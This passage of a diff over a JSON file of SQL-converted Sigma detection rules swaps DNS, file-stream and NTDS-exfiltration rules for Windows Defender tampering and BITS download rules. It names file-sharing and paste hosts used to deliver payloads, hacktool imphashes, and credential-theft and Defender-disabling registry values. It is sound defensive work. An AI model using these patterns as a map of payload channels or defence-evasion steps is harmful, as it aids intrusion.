LIKE 'C:\\\\Windows\\\\System32\\\\Taskmgr.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\')) OR ((ProcessName LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\WINDOWS\\\\Installer\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\'))))" ], - "filename": "dns_query_win_mega_nz.yml" + "filename": "win_defender_alert_lsass_access.yml" }, { - "title": "DNS Query Tor Onion Address - Sysmon", - "id": "b55ca2a3-7cff-4dda-8bdd-c7bfa63bf544", + "title": "Win Defender Restored Quarantine File", + "id": "bc92ca75-cd42-4d61-9a37-9d5aa259c88b", "status": "experimental", - "description": "Detects DNS queries to an \".onion\" address related to Tor routing networks", - "author": "frack113", + "description": "Detects the restoration of files from the defender quarantine", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1090.003" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate administrator activity restoring a file" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE QueryName LIKE '%.onion%' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1009')" ], - "filename": "dns_query_win_tor_onion.yml" + "filename": "win_defender_restored_quarantine_file.yml" }, { - "title": "Potential SocGholish Second Stage C2 DNS Query", - "id": "70761fe8-6aa2-4f80-98c1-a57049c08e66", - "status": "experimental", - "description": "Detects a DNS query initiated from a \"wscript\" process for domains matching a specific pattern that was seen being used by SocGholish for its Command and Control traffic", - "author": "Dusty Miller", + "title": "Windows Defender Threat Detected", + "id": "57b649ef-ff42-4fb0-8bf6-62da243a1708", + "status": "stable", + "description": "Detects all actions taken by Windows Defender malware detection engines", + "author": "Ján Trenčanský", "tags": [ - "attack.command_and_control", - "attack.t1219" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Legitimate domain names matching the regex pattern by chance (e.g. domain controllers dc01.company.co.uk)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' AND QueryName REGEXP '[a-f0-9]{4,8}\\.(?:[a-z0-9\\-]+\\.){2}[a-z0-9\\-]+')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID IN ('1006', '1116', '1015', '1117'))" ], - "filename": "dns_query_win_malware_socgholish_second_stage_c2.yml" + "filename": "win_defender_threat.yml" }, { - "title": "Hacktool Download", - "id": "19b041f6-e583-40dc-b842-d6fa8011493f", - "status": "experimental", - "description": "Detects the creation of a file on disk that has an imphash of a well-known hack tool", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender AMSI Trigger Detected", + "id": "ea9bf0fa-edec-4fb8-8b78-b119f2528186", + "status": "stable", + "description": "Detects triggering of AMSI by Windows Defender.", + "author": "Bhabesh Raj", "tags": [ - "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Imphash IN ('bcca3c247b619dcd13c8cdff5f123932', '3a19059bd7688cb88e70005f18efc439', 'bf6223a49e45d99094406777eb6004ba', '0c106686a31bfe2ba931ae1cf6e9dbc6', '0d1447d4b3259b3c2a1d4cfb7ece13c3', '1b0369a1e06271833f78ffa70ffb4eaf', '4c1b52a19748428e51b14c278d0f58e3', '4d927a711f77d62cebd4f322cb57ec6f', '66ee036df5fc1004d9ed5e9a94a1086a', '672b13f4a0b6f27d29065123fe882dfc', '6bbd59cea665c4afcc2814c1327ec91f', '725bb81dc24214f6ecacc0cfb36ad30d', '9528a0e91e28fbb88ad433feabca2456', '9da6d5d77be11712527dcab86df449a3', 'a6e01bc1ab89f8d91d9eab72032aae88', 'b24c5eddaea4fe50c6a96a2a133521e4', 'd21bbc50dcc169d7b4d0f01962793154', 'fcc251cceae90d22c392215cc9a2d5d6', '23867a89c2b8fc733be6cf5ef902f2d1', 'a37ff327f8d48e8a4d2f757e1b6e70bc', 'f9a28c458284584a93b14216308d31bd', '6118619783fc175bc7ebecff0769b46e', '959a83047e80ab68b368fdb3f4c6e4ea', '563233bfa169acc7892451f71ad5850a', '87575cb7a0e0700eb37f2e3668671a08', '13f08707f759af6003837a150a371ba1', '1781f06048a7e58b323f0b9259be798b', '233f85f2d4bc9d6521a6caae11a1e7f5', '24af2584cbf4d60bbe5c6d1b31b3be6d', '632969ddf6dbf4e0f53424b75e4b91f2', '713c29b396b907ed71a72482759ed757', '749a7bb1f0b4c4455949c0b2bf7f9e9f', '8628b2608957a6b0c6330ac3de28ce2e', '8b114550386e31895dfab371e741123d', '94cb940a1a6b65bed4d5a8f849ce9793', '9d68781980370e00e0bd939ee5e6c141', 'b18a1401ff8f444056d29450fbc0a6ce', 'cb567f9498452721d77a451374955f5f', '730073214094cd328547bf1f72289752', '17b461a082950fc6332228572138b80c', 'dc25ee78e2ef4d36faa0badf1e7461c9', '819b19d53ca6736448f9325a85736792', '829da329ce140d873b4a8bde2cbfaa7e', 'c547f2e66061a8dffb6f5a3ff63c0a74', '0588081ab0e63ba785938467e1b10cca', '0d9ec08bac6c07d9987dfd0f1506587c', 'bc129092b71c89b4d4c8cdf8ea590b29', '4da924cf622d039d58bce71cdf05d242', 'e7a3a5c377e2d29324093377d7db1c66', '9a9dbec5c62f0380b4fa5fd31deffedf', 'af8a3976ad71e5d5fdfb67ddb8dadfce', '0c477898bbf137bbd6f2a54e3b805ff4', '0ca9f02b537bcea20d4ea5eb1a9fe338', '3ab3655e5a14d4eefc547f4781bf7f9e', 'e6f9d5152da699934b30daab206471f6', '3ad59991ccf1d67339b319b15a41b35d', 'ffdd59e0318b85a3e480874d9796d872', '0cf479628d7cc1ea25ec7998a92f5051', '07a2d4dcbd6cb2c6a45e6b101f0b6d51', 'd6d0f80386e1380d05cb78e871bc72b1', '38d9e015591bbfd4929e0d0f47fa0055', '0e2216679ca6e1094d63322e3412d650', 'ada161bf41b8e5e9132858cb54cab5fb', '2a1bc4913cd5ecb0434df07cb675b798', '11083e75553baae21dc89ce8f9a195e4', 'a23d29c9e566f2fa8ffbb79267f5df80', '4a07f944a83e8a7c2525efa35dd30e2f', '767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', '3de09703c8e79ed2ca3f01074719906b', 'a53a02b997935fd8eedcb5f7abab9b9f', 'e96a73c7bf33a464c510ede582318bf2', '32089b8851bbf8bc2d014e9f37288c83', '09D278F9DE118EF09163C6140255C690', '03866661686829d806989e2fc5a72606', 'e57401fbdadcd4571ff385ab82bd5d6d', '84B763C45C0E4A3E7CA5548C710DB4EE', '19584675d94829987952432e018d5056', '330768a4f172e10acb6287b87289d83b', '885c99ccfbe77d1cbfcb9c4e7c1a3313', '22a22bc9e4e0d2f189f1ea01748816ac', '7fa30e6bb7e8e8a69155636e50bf1b28') OR (Hash LIKE '%IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3A19059BD7688CB88E70005F18EFC439%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=bf6223a49e45d99094406777eb6004ba%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C106686A31BFE2BA931AE1CF6E9DBC6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D1447D4B3259B3C2A1D4CFB7ECE13C3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1B0369A1E06271833F78FFA70FFB4EAF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4C1B52A19748428E51B14C278D0F58E3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4D927A711F77D62CEBD4F322CB57EC6F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=66EE036DF5FC1004D9ED5E9A94A1086A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=672B13F4A0B6F27D29065123FE882DFC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6BBD59CEA665C4AFCC2814C1327EC91F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=725BB81DC24214F6ECACC0CFB36AD30D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9528A0E91E28FBB88AD433FEABCA2456%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9DA6D5D77BE11712527DCAB86DF449A3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A6E01BC1AB89F8D91D9EAB72032AAE88%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B24C5EDDAEA4FE50C6A96A2A133521E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D21BBC50DCC169D7B4D0F01962793154%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FCC251CCEAE90D22C392215CC9A2D5D6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=F9A28C458284584A93B14216308D31BD%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6118619783FC175BC7EBECFF0769B46E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=563233BFA169ACC7892451F71AD5850A%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=87575CB7A0E0700EB37F2E3668671A08%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=13F08707F759AF6003837A150A371BA1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=1781F06048A7E58B323F0B9259BE798B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=713C29B396B907ED71A72482759ED757%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=8B114550386E31895DFAB371E741123D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9D68781980370E00E0BD939EE5E6C141%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=B18A1401FF8F444056D29450FBC0A6CE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=CB567F9498452721D77A451374955F5F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=730073214094CD328547BF1F72289752%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=17B461A082950FC6332228572138B80C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=819B19D53CA6736448F9325A85736792%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0588081AB0E63BA785938467E1B10CCA%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=BC129092B71C89B4D4C8CDF8EA590B29%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4DA924CF622D039D58BCE71CDF05D242%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E7A3A5C377E2D29324093377D7DB1C66%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=9A9DBEC5C62F0380B4FA5FD31DEFFEDF%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=AF8A3976AD71E5D5FDFB67DDB8DADFCE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0C477898BBF137BBD6F2A54E3B805FF4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CA9F02B537BCEA20D4EA5EB1A9FE338%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AB3655E5A14D4EEFC547F4781BF7F9E%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E6F9D5152DA699934B30DAAB206471F6%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3AD59991CCF1D67339B319B15A41B35D%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=FFDD59E0318B85A3E480874D9796D872%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0CF479628D7CC1EA25EC7998A92F5051%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=07A2D4DCBD6CB2C6A45E6B101F0B6D51%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=D6D0F80386E1380D05CB78E871BC72B1%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=38D9E015591BBFD4929E0D0F47FA0055%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=0E2216679CA6E1094D63322E3412D650%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=ADA161BF41B8E5E9132858CB54CAB5FB%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=2A1BC4913CD5ECB0434DF07CB675B798%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=11083E75553BAAE21DC89CE8F9A195E4%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A23D29C9E566F2FA8FFBB79267F5DF80%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=4A07F944A83E8A7C2525EFA35DD30E2F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=A53A02B997935FD8EEDCB5F7ABAB9B9F%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=E96A73C7BF33A464C510EDE582318BF2%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=32089B8851BBF8BC2D014E9F37288C83%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=09D278F9DE118EF09163C6140255C690%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=03866661686829d806989e2fc5a72606%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=e57401fbdadcd4571ff385ab82bd5d6d%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=84B763C45C0E4A3E7CA5548C710DB4EE%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=19584675D94829987952432E018D5056%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=885C99CCFBE77D1CBFCB9C4E7C1A3313%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=22A22BC9E4E0D2F189F1EA01748816AC%' ESCAPE '\\' OR Hash LIKE '%IMPHASH=7FA30E6BB7E8E8A69155636E50BF1B28%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '1116' AND SourceName = 'AMSI')" ], - "filename": "create_stream_hash_hacktool_download.yml" + "filename": "win_defender_amsi_trigger.yml" }, { - "title": "Unusual File Download from Direct IP Address", - "id": "025bd229-fd1f-4fdb-97ab-20006e1a5368", + "title": "Windows Defender Exploit Guard Tamper", + "id": "a3ab73f1-bd46-4319-8f06-4b20d0617886", "status": "experimental", - "description": "Detects the download of suspicious file type from URLs with IP", - "author": "Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems)", + "description": "Detects when someone is adding or removing applications or folder from exploit guard \"ProtectedFolders\" and \"AllowedApplications\"", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Contents REGEXP 'http[s]?://[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}' AND (TargetFilename LIKE '%.ps1:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.bat:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cmd:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND ((EventID = '5007' AND NewValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\AllowedApplications\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')) OR (EventID = '5007' AND OldValue LIKE '%\\\\Windows Defender\\\\Windows Defender Exploit Guard\\\\Controlled Folder Access\\\\ProtectedFolders\\\\%' ESCAPE '\\')))" ], - "filename": "create_stream_hash_susp_ip_domains.yml" + "filename": "win_defender_exploit_guard_tamper.yml" }, { - "title": "Exports Registry Key To an Alternate Data Stream", - "id": "0d7a9363-af70-4e7b-a3b7-1a176b7fbe84", - "status": "test", - "description": "Exports the target Registry key and hides it in the specified alternate data stream.", - "author": "Oddvar Moe, Sander Wiebing, oscd.community", + "title": "Microsoft Defender Tamper Protection Trigger", + "id": "49e5bc24-8b86-49f1-b743-535f332c2856", + "status": "stable", + "description": "Detects blocked attempts to change any of Defender's settings such as \"Real Time Monitoring\" and \"Behavior Monitoring\"", + "author": "Bhabesh Raj, Nasreddine Bencherchali", "tags": [ "attack.defense_evasion", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator might try to disable defender features during testing (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE NewProcessName LIKE '%\\\\regedit.exe' ESCAPE '\\'" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5013' AND (Value LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\DisableAntiVirus' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableArchiveScanning' ESCAPE '\\' OR Value LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningNetworkFiles' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableRealtimeMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableBehaviorMonitoring' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableIOAVProtection' ESCAPE '\\' OR Value LIKE '%\\\\Real-Time Protection\\\\DisableScriptScanning' ESCAPE '\\'))" ], - "filename": "create_stream_hash_regedit_export_to_ads.yml" + "filename": "win_defender_tamper_protection_trigger.yml" }, { - "title": "Suspicious File Download From File Sharing Websites", - "id": "52182dfb-afb7-41db-b4bc-5336cb29b464", - "status": "experimental", - "description": "Detects the download of suspicious file type from a well-known file and paste sharing domain", - "author": "Florian Roth (Nextron Systems)", + "title": "Windows Defender Suspicious Configuration Changes", + "id": "801bd44f-ceed-4eb6-887c-11544633c0aa", + "status": "stable", + "description": "Detects suspicious changes to the windows defender configuration", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.s0139", - "attack.t1564.004" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Administrator activity (must be investigated)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((Contents LIKE '%https://transfer.sh/%' ESCAPE '\\' OR Contents LIKE '%raw.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%gist.githubusercontent.com%' ESCAPE '\\' OR Contents LIKE '%pastebin.com%' ESCAPE '\\' OR Contents LIKE '%cdn.discordapp.com/attachments/%' ESCAPE '\\' OR Contents LIKE '%mediafire.com%' ESCAPE '\\' OR Contents LIKE '%mega.nz%' ESCAPE '\\' OR Contents LIKE '%ddns.net%' ESCAPE '\\' OR Contents LIKE '%.paste.ee%' ESCAPE '\\' OR Contents LIKE '%.hastebin.com%' ESCAPE '\\' OR Contents LIKE '%.ghostbin.co/%' ESCAPE '\\' OR Contents LIKE '%ufile.io%' ESCAPE '\\' OR Contents LIKE '%storage.googleapis.com%' ESCAPE '\\' OR Contents LIKE '%anonfiles.com%' ESCAPE '\\' OR Contents LIKE '%send.exploit.in%' ESCAPE '\\' OR Contents LIKE '%privatlab.net%' ESCAPE '\\' OR Contents LIKE '%privatlab.com%' ESCAPE '\\' OR Contents LIKE '%sendspace.com%' ESCAPE '\\' OR Contents LIKE '%pastetext.net%' ESCAPE '\\' OR Contents LIKE '%pastebin.pl%' ESCAPE '\\' OR Contents LIKE '%paste.ee%' ESCAPE '\\') AND (TargetFilename LIKE '%.exe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbs:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.vbe:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.dll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.one:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.hta:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.lnk:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.xll:Zone%' ESCAPE '\\' OR TargetFilename LIKE '%.cpl:Zone%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Defender/Operational' AND EventID = '5007' AND (NewValue LIKE '%\\\\Windows Defender\\\\DisableAntiSpyware %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableRemovableDriveScanning %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\Scan\\\\DisableScanningMappedNetworkDrivesForFullScan %' ESCAPE '\\' OR NewValue LIKE '%\\\\Windows Defender\\\\SpyNet\\\\DisableBlockAtFirstSeen %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SpyNetReporting %' ESCAPE '\\' OR NewValue LIKE '%\\\\Real-Time Protection\\\\SubmitSamplesConsent %' ESCAPE '\\'))" ], - "filename": "create_stream_hash_file_sharing_domains_download_susp_extension.yml" + "filename": "win_defender_suspicious_features_tampering.yml" }, { - "title": "Suspicious NTDS Exfil Filename Patterns", - "id": "3a8da4e0-36c1-40d2-8b29-b3e890d5172a", - "status": "test", - "description": "Detects suspicious creations of files with names used in various tools that export the NTDS.DIT for exfiltration", + "title": "BITS Transfer Job Download To Potential Suspicious Folder", + "id": "f8a56cb7-a363-44ed-a82f-5926bb44cd05", + "status": "experimental", + "description": "Detects new BITS transfer job where the LocalName/Saved file is stored in a potentially suspicious location", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.defense_evasion", + "attack.persistence", + "attack.t1197" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (TargetFilename LIKE '%\\\\All.cab' ESCAPE '\\' OR TargetFilename LIKE '%.ntds.cleartext' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND EventID = '16403' AND (LocalName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR LocalName LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\'))" ], - "filename": "file_event_win_ntds_exfil_tools.yml" + "filename": "win_bits_client_new_trasnfer_susp_local_folder.yml" }, { - "title": "Office Template Creation", - "id": "0e20c89d-2264-44ae-8238-aeeaba609ece", + "title": "BITS Transfer Job Download From Direct IP", + "id": "90f138c1-f578-4ac3-8c49-eecfd847c8b7", "status": "experimental", - "description": "Detects creation of template files for Microsoft Office from outside Office", - "author": "Max Altgelt (Nextron Systems)", + "description": "Detects a BITS transfer job downloading file(s) from a direct IP address.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ + "attack.defense_evasion", "attack.persistence", - "attack.t1137" + "attack.t1197" ], "falsepositives": [ - "Loading a user environment from a backup or a domain controller", - "Synchronization of templates" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((((TargetFilename LIKE '%.dot' ESCAPE '\\' OR TargetFilename LIKE '%.dotm' ESCAPE '\\' OR TargetFilename LIKE '%.doc' ESCAPE '\\' OR TargetFilename LIKE '%.docm' ESCAPE '\\' OR TargetFilename LIKE '%.docx' ESCAPE '\\' OR TargetFilename LIKE '%.rtf' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Word\\\\Startup%' ESCAPE '\\') OR ((TargetFilename LIKE '%.xlt' ESCAPE '\\' OR TargetFilename LIKE '%.xltm' ESCAPE '\\' OR TargetFilename LIKE '%.xls' ESCAPE '\\' OR TargetFilename LIKE '%.xlsm' ESCAPE '\\' OR TargetFilename LIKE '%.xlsx' ESCAPE '\\') AND TargetFilename LIKE '%\\\\Microsoft\\\\Excel\\\\Startup%' ESCAPE '\\')) AND NOT ((NewProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\EXCEL.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Bits-Client/Operational' AND (EventID = '16403' AND (RemoteName LIKE '%http://1%' ESCAPE '\\' OR RemoteName LIKE '%http://2%' ESCAPE '\\' OR RemoteName LIKE '%http://3%' ESCAPE '\\' OR RemoteName LIKE '%http://4%' ESCAPE '\\' OR RemoteName LIKE '%http://5%' ESCAPE '\\' OR RemoteName LIKE '%http://6%' ESCAPE '\\' OR RemoteName LIKE '%http://7%' ESCAPE '\\' OR RemoteName LIKE '%http://8%' ESCAPE '\\' OR RemoteName LIKE '%http://9%' ESCAPE '\\' OR RemoteName LIKE '%https://1%' ESCAPE '\\' OR RemoteName LIKE '%https://2%' ESCAPE '\\' OR RemoteName LIKE '%https://3%' ESCAPE '\\' OR RemoteName LIKE '%https://4%' ESCAPE '\\' OR RemoteName LIKE '%https://5%' ESCAPE '\\' OR RemoteName LIKE '%https://6%' ESCAPE '\\' OR RemoteName LIKE '%https://7%' ESCAPE '\\' OR RemoteName LIKE '%https://8%' ESCAPE '\\' OR RemoteName LIKE '%https://9%' ESCAPE '\\')) AND NOT (((RemoteName LIKE '%://10.%' ESCAPE '\\' OR RemoteName LIKE '%://192.168.%' ESCAPE '\\' OR RemoteName LIKE '%://172.16.%' ESCAPE '\\' OR RemoteName LIKE '%://172.17.%' ESCAPE '\\' OR RemoteName LIKE '%://172.18.%' ESCAPE '\\' OR RemoteName LIKE '%://172.19.%' ESCAPE '\\' OR RemoteName LIKE '%://172.20.%' ESCAPE '\\' OR RemoteName LIKE '%://172.21.%' ESCAPE '\\' OR RemoteName LIKE '%://172.22.%' ESCAPE '\\' 